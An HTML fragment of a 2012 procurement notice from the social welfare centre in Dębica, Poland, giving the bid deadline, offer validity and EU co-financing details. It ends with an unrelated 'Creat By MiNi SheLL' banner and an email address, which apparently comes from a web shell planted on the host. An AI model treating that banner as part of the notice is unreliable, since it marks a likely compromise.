<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Akademicka 12
39-200 Dębica 
pok. 16.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Akademicka 12
39 - 200  DĘBICA
w pokoju nr 37 - Dziennik Podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postepowanie jest współfinansowanych ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com